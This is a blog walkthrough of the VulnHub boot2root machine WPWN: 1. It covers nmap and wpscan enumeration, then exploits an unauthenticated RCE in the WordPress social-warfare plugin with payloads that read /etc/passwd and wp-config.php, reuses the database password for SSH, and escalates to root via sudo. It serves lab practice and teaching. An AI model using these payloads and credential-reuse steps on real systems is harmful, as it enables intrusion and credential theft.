wpwn vulnhub walkthrough

Today, I am going to share a walkthrough for the boot2root challenge of the vulnhub machine WPWN: 1. It is made by the 0xatom team difficulty level of this machine is the easy level. And this machine goal is to read the two flag user.txt and root.txt.

you can download here the VM

Network Scanning

Let’s start IP scanning for this machine using Netdiscover, finding our target IP address.

nmap -sn

As we got our target IP address for the machine (, and our next step is use the nmap for the port scanning and further information gathering on the target machine.

nmap -sV -sC


Since we see target machine port 80 is open, Let’s explore the IP address using a web browser. and try some enumeration trick like checking robots.txt and page source code. but we still didn’t find anything useful.

After running the dirb we discover a /WordPress URL but it doesn’t show any without wasting our time we started wpscan and enumerating all installed plugins.

wpscan --url -e ap

our scanning is almost completed and we discover a vulnerable plugin social-warfare I search the google I found an unauthenticated REC ( Remote Code Execution ) Vulnerability

using the vulnerability we can read every file target machine and execute any Linux command let’s read the passwd file. I save an exploit our local system and starting our local python server on port 80 using the command.

echo "<pre>system('cat /etc/passwd')</pre>
python3 -m http.server 80

Now explore the URL

for more enumeration I read the target WordPress configuration (wp-config.php) file using the command

echo "<pre>system('cat /var/www/html/wordpress/wp-config.php')</pre>
python3 -m http.server 80
wordpress configuration file ( wp-config.php )

Now we

have more information on our target machine since we found a system user ( takis ) by reading /etc/passwd file and we got any MySQL username and password. we will be trying these credentials for ssh login.

and we found valid username and password . taskis as a username and DB_PASSWORD for password.

sudo ssh takis@
cat user.txt

Privilege Escalation

First of all, we checked the user privileges using the command sudo -l. As per sudo permission, the user can run any command without a password now we switch the shell using the sudo su command and we get the root shell target machine.

sudo -l
sudo su
cd /root
cat root.txt

I’m reading our last root flag according to this message our root flag is hidden in the USB directory I use the find command for finding our root flag. we complete the CTF challenge by reading the root flag.

find / type -d -name "USB" 2>/dev/null
cd /usr/games/USB
cat root

Escalate my privilege Vulnhub Walkthrough link

Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

Published by
Rahul Gehlaut

Recent Posts

Lubuntu Installation – Install Lubuntu on Virtualbox

Today in this post we are going install another Linux operating system Lubuntu, Lubuntu is…

4 months ago

Qubes OS Installation

In this post we are going to install another Linux Operating System Qubes OS, Qubes…

4 months ago

DataLife Engine Installation

In this post we are going to install DataLife Engine on the Ubuntu server, DataLife…

5 months ago